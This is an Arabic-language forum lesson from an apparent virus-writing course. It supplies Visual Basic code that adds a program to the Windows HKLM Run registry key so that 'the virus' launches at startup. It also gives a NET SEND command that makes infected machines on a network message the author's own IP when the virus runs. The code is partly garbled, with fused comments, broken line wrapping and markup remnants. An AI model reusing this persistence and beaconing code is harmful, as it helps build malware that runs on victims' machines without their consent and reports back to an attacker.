الدرس السادس
الدرس هذا مهم جدا
اخواني الاعزاء هذا الدرس يعتبر خاص في الدورة لانه عندما طرحة الدورة لقد نسيت بعض الاشياء المهمة و يجب علي اكمالها و ان شاء الله في هذا الدرس سوف ابري ذمتي من اجل اكمال الدورة .
1.طريقة تشغيل الفيروس عند بدا التشغيل :
سوف نستخدم لغة الفيجول بيسك و يجب على الشخص الذي يريد استخدام الكود لديه مستوى و لو فوق الوسط ليعرف وضع الكودات على كلاً يوجد كتاب و دورة الاستاذ الصقر الجراح يمكن من خلاالها تعلم الفيجول بيسك و انا انصح به المهم الان سوف اعطيكم الكودات و مناطق وضعها اما عن كيفية دمج الفيروس مع الفيجول فراجعوا الدرس الاول لمعرفة الطريقة الكاملة .
كود PHP:
كود بدا التشغيل :
في الموديل :
Option Explicit
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long
Private Const READ_CONTROL = &H20000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_NOTIFY = &H10
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
Private Const KEY_EXECUTE =
KEY_READ
Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE
+ KEY_SET_VALUE + KEY_CREATE_SUB_KEY
+ KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY
+ KEY_CREATE_LINK + READ_CONTROL
Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Private Const HKLM =
&H80000002
' استخدم الامر التالي لالغاء التشغيل التلقائي Public Sub DoNotRun(ProgramName
As String) Dim hKey As Long Dim Ret
As Long ' فتح
المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS,
hKey) ' حذفها من
مسجل النظام. Ret =
RegDeleteValue(hKey, ProgramName) ' إغلاق
المفتاح RegCloseKey hKey End
Sub Public Sub RunWhenStartup(ProgramName
As String, ProgramPath As
String) Dim hKey
As Long Dim Ret As Long ' فتح
المفتاح المطلوب Ret =
RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) '
إنشاء قيمة جديدة بإسم
البرنامج وعنوانه. Ret =
RegSetValueEx(hKey,
ProgramName, 0&, 1,
ProgramPath, Len(ProgramPath)) 'LenB(StrConv(TheData,
vbFromUnicode)) +
1) '
إغلاق المفتاح RegCloseKey hKey End Sub ------------ في
الفورم : RunWhenStartup "عنوان",
App.Path & "" &
App.EXEName & ".exe" <
/FONT
>
2.كيفية التبليغ : (فقط في الشبكات)
اعرف جيد جدا انه لا يوجد فيروس في العالم يحوي شيء اسمه تبليغ لاكن بعد الان سوف يوجد نعم اخواني هذه الطريقة المجربة و لا يوجد به اي خطا كود بسيط يعادل الف برامج قراصنة الانترنيت كل ما علينا فعله هو اضافة هذا السطر الى كود الفيروس مع تغير بعض الاشياء كاتالي :
كود PHP:
NET SEND 127.0.0.1 Run Virus Now
الان سوف نجري بعض التغيرات
Run Virus Now ضع الرسالة التي تريد ان تصلك و حتى لو في العربي
127.0.0.1 ضع رقم ip الخاص بك و سوف يتم ارسال الرسالة الى ip الخاص بك
اذ لا تعرف ip يمكنك زيارة هذا الموقع و سوف يظهر الايبي مباشرة :
showmyip.com - geospoofing your cyber presence